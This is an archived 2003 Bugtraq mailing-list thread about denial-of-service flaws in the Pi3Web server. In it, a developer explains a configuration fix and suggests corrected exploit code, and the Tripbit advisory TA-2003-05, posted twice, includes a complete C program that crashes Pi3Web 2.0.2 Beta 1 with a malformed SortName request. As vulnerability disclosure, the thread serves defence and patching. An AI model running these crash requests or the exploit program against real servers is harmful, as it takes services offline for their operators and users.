103127 2003-06-01 22:11 /122 rader/ Holger Zimmermann <zimpel@users.sourceforge.net>
Importerad: 2003-06-01 22:11 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5098>
Ärende: Re: Unix Version of the Pi3web DoS
------------------------------------------------------------
In-Reply-To: <20030512154945.29319.qmail@www.securityfocus.com>
The vulnerability exists in Unix version of Pi3Web
2.0.1 only,
which use the one of the following configuration files
shipped
with the binary distributions for Linux or Solaris :
/usr/local/Pi3Web/Conf/Devel.pi3
/usr/local/Pi3Web/Conf/Features.pi3
Note, that the configuration file intended to use with
a production
internet server is NOT vulnerable :
/usr/local/Pi3Web/Conf/Internet.pi3
Note, that the configuration file intended to use with
Windows
servers is also vulnerable but not relevant on unix :
/usr/local/Pi3Web/Conf/Config.pi3
The problem itself is caused by the PathInfo="Yes"
parameter in the
following configuration objects:
#
# Override some mappings for Host2 only
#
<Object>
Name Host2Mappings
Class FlexibleHandlerClass
#
# These mappings only apply to Host2
#
Condition "&cmp($o,Host2)"
#
# map to second document root
#
Mapping PathMapper From="/" To="WebRoot2/" PathInfo="Yes"
</Object>
#
# Host1 mappings
#
<Object>
Name Host1Mappings
Class FlexibleHandlerClass
#
# These mappings only apply to MainVirtualHostInformation
#
Condition "&cmp($o,MainVirtualHostInformation)"
#
# map to first document root
#
Mapping PathMapper From="/" To="WebRoot/" PathInfo="Yes"
</Object>
Remove both occurances of the PathInfo="Yes" from the
configuration
and restart the server in order to fix the reported issue.
Earlier Unix versions than 2.01 are NOT vulnerable.
Win32 versions are NOT vulnerable, because the
parameter has been added
in version 2.0.1 only and a related patch for the
administration client
is available, which corrects this problem in the same
manner :
http://sourceforge.net/tracker/download.php?group_id=17753&atid=317753&file_id=47258&aid=718552
Another remark: the sample code for the exploit is not
correct :
1.) the buffer with the request string is not finished
with '\0'.
2.) the constructed request is only HTTP/0.9, because
the protocol
version is missing in the message.
The current program will generate a malicious request
but I think the intended behaviour is rather to send a
valid HTTP message containing
a malicious URI path.
A proposed enhancement of the exploit looks like:
int main(int argc, char **argv)
{
int i, port, sd, rc;
char buffer[356];
char packet[380];
struct sockaddr_in server;
if(argc > 3 || argc < 2)
{
printf("USAGE: %s IP PORT\n", argv[0]);
printf("e.g. ./pi3web-DoS 127.0.0.1 80\n");
exit(0);
}
if(argc == 2) port = 80;
else port = atoi(argv[2]);
//Build the malformed request
for(i = 0; i < 355; i++) buffer[i] = '/';
buffer[i] = 0;
sprintf(packet, "GET %s HTTP/1.0\n\n", buffer);
The original code generates requests like:
GET //////...///////¿ �@�f�@P
The enhanced code generates requests like:
GET //////.../////// HTTP/1.0
--
regards
Holger Zimmermann
(103127) /Holger Zimmermann <zimpel@users.sourceforge.net>/
103335 2003-06-03 19:36 /272 rader/ Rushjo@tripbit.org <rushjo@tripbit.org>
Importerad: 2003-06-03 19:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5112>
Ärende: Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web Server v2.0.2 Beta 1
------------------------------------------------------------
Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web
Server v2.0.2 Beta 1
=========================================================================================
PROGRAM: Pi3 Web Server
HOMEPAGE: http://pi3web.sourceforge.net/pi3web/
VULNERABLE VERSIONS: v2.0.2 Beta 1
RISK: Medium/High
IMPACT: Denial of Service
RELEASE DATE: 2003-05
========================================================================================
TABLE OF CONTENTS
========================================================================================
1............................................................................DESCRIPTION
2................................................................................DETAILS
3................................................................................EXPLOIT
4..............................................................................SOLUTIONS
5..........................................................................VENDOR
STATUS
6................................................................................CREDITS
7.............................................................................DISCLAIMER
8.............................................................................REFERENCES
9...............................................................................FEEDBACK
1. DESCRIPTION
========================================================================================
The Pi3 Component architecture is a high performance server based
suite of libraries to enable rapid development of server
software. One of the components available for this architecture is
Pi3Web. A buffer overflow vulnerability in the product allows remote
attackers to crash the server by issuing a malformed request.
2. DETAILS
========================================================================================
The problem lies in the Directory Index with "Name" as Hyperlink
Column. If following configuration is in use, allow this a remote
attacker to crash the server by issuing this malformed request:
http://host.com/</?SortName=A
The administrator of the server must use one of the following
directory layouts:
General Layout
--------------
[*] HTML index with tables
or
[*] HTML index with fixed font
or
[*] Generic HTML index
For this vulnerability must this two options set:
Columns
-------
[*] Name - must be activated!
Sorting
-------
[*] Column title as hyperlink - must be activated!
3. EXPLOIT
========================================================================================
/*********************************************************************
*
* Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
* Tripbit Security Development
* ----------------------------
*
* Author: posidron
*
* Contact
* [-] Mail: posidron@tripbit.org
* [-] Web: http://www.tripbit.org
* [-] Forum: http://www.tripbit.org/wbboard
* [-] IRC: irc.euirc.net 6667 #tripbit
*
*
* Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
* Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int port, sockfd;
struct sockaddr_in server;
struct hostent *host;
char sendstring[1024];
strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");
if(argc < 3)
{
printf("Usage: %s [target] <port>\n",argv[0]);
exit(0);
}
port = atoi(argv[2]);
host = gethostbyname(argv[1]);
if(host == NULL)
{
printf("Connection failed!...\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = inet_addr((char*)argv[1]);
if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
{
printf("Can't start socket()!\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
{
printf("Can't connect!\n");
exit(0);
}
printf("Dos against Pi3 Web Server v2.0.2\n");
write(sockfd,sendstring,strlen(sendstring));
printf("Attack done!...\n");
close(sockfd);
}
4. SOLUTIONS
========================================================================================
Download the new Version, it is available on Sourceforge.
http://osdn.dl.sourceforge.net/sourceforge/pi3web/Pi3Web-x86Win32-2_0_2-beta2.exe
5. VENDOR STATUS
========================================================================================
The vendor has reportedly been notified and fix the bug in Version
2.0.2 Beta 1.
6. CREDITS
========================================================================================
Rushjo, Tec, MisterMoe, Havoc][, PeaceTreaty, STeFaN
7. DISLAIMER
========================================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this
information. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information. Any use of this information is at the user's own
risk.
8. RFERENCES
========================================================================================
http://www.tripbit.org
9. FEEDBACK
========================================================================================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
Site: http://www.tripbit.org
Mail: posidron@tripbit.org
rushjo@tripbit.org
tec@tripbit.org
(103335) /Rushjo@tripbit.org <rushjo@tripbit.org>/(Ombruten)
Bilaga (text/plain) i text 103336
103336 2003-06-03 19:36 /251 rader/ Rushjo@tripbit.org <rushjo@tripbit.org>
Bilagans filnamn: "pi3_advisory.txt"
Importerad: 2003-06-03 19:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5113>
Bilaga (text/plain) till text 103335
Ärende: Bilaga (pi3_advisory.txt) till: Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web Server v2.0.2 Beta 1
------------------------------------------------------------
Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web Server v2.0.2 Beta 1
=========================================================================================
PROGRAM: Pi3 Web Server
HOMEPAGE: http://pi3web.sourceforge.net/pi3web/
VULNERABLE VERSIONS: v2.0.2 Beta 1
RISK: Medium/High
IMPACT: Denial of Service
RELEASE DATE: 2003-05
========================================================================================
TABLE OF CONTENTS
========================================================================================
1............................................................................DESCRIPTION
2................................................................................DETAILS
3................................................................................EXPLOIT
4..............................................................................SOLUTIONS
5..........................................................................VENDOR STATUS
6................................................................................CREDITS
7.............................................................................DISCLAIMER
8.............................................................................REFERENCES
9...............................................................................FEEDBACK
1. DESCRIPTION
========================================================================================
The Pi3 Component architecture is a high performance server based
suite of libraries to enable rapid development of server
software. One of the components available for this architecture is
Pi3Web. A buffer overflow vulnerability in the product allows remote
attackers to crash the server by issuing a malformed request.
2. DETAILS
========================================================================================
The problem lies in the Directory Index with "Name" as Hyperlink
Column. If following configuration is in use, allow this a remote
attacker to crash the server by issuing this malformed request:
http://host.com/</?SortName=A
The administrator of the server must use one of the following
directory layouts:
General Layout
--------------
[*] HTML index with tables
or
[*] HTML index with fixed font
or
[*] Generic HTML index
For this vulnerability must this two options set:
Columns
-------
[*] Name - must be activated!
Sorting
-------
[*] Column title as hyperlink - must be activated!
3. EXPLOIT
========================================================================================
/*********************************************************************
*
* Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
* Tripbit Security Development
* ----------------------------
*
* Author: posidron
*
* Contact
* [-] Mail: posidron@tripbit.org
* [-] Web: http://www.tripbit.org
* [-] Forum: http://www.tripbit.org/wbboard
* [-] IRC: irc.euirc.net 6667 #tripbit
*
*
* Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
* Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int port, sockfd;
struct sockaddr_in server;
struct hostent *host;
char sendstring[1024];
strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");
if(argc < 3)
{
printf("Usage: %s [target] <port>\n",argv[0]);
exit(0);
}
port = atoi(argv[2]);
host = gethostbyname(argv[1]);
if(host == NULL)
{
printf("Connection failed!...\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = inet_addr((char*)argv[1]);
if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
{
printf("Can't start socket()!\n");
exit(0);
}
if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
{
printf("Can't connect!\n");
exit(0);
}
printf("Dos against Pi3 Web Server v2.0.2\n");
write(sockfd,sendstring,strlen(sendstring));
printf("Attack done!...\n");
close(sockfd);
}
4. SOLUTIONS
========================================================================================
Download the new Version, it is available on Sourceforge.
http://osdn.dl.sourceforge.net/sourceforge/pi3web/Pi3Web-x86Win32-2_0_2-beta2.exe
5. VENDOR STATUS
========================================================================================
The vendor has reportedly been notified and fix the bug in Version
2.0.2 Beta 1.
6. CREDITS
========================================================================================
Rushjo, Tec, MisterMoe, Havoc][, PeaceTreaty, STeFaN
7. DISLAIMER
========================================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this
information. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information. Any use of this information is at the user's own
risk.
8. RFERENCES
========================================================================================
http://www.tripbit.org
9. FEEDBACK
========================================================================================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
Site: http://www.tripbit.org
Mail: posidron@tripbit.org
rushjo@tripbit.org
tec@tripbit.org
(103336) /Rushjo@tripbit.org <rushjo@tripbit.org>/(Ombruten)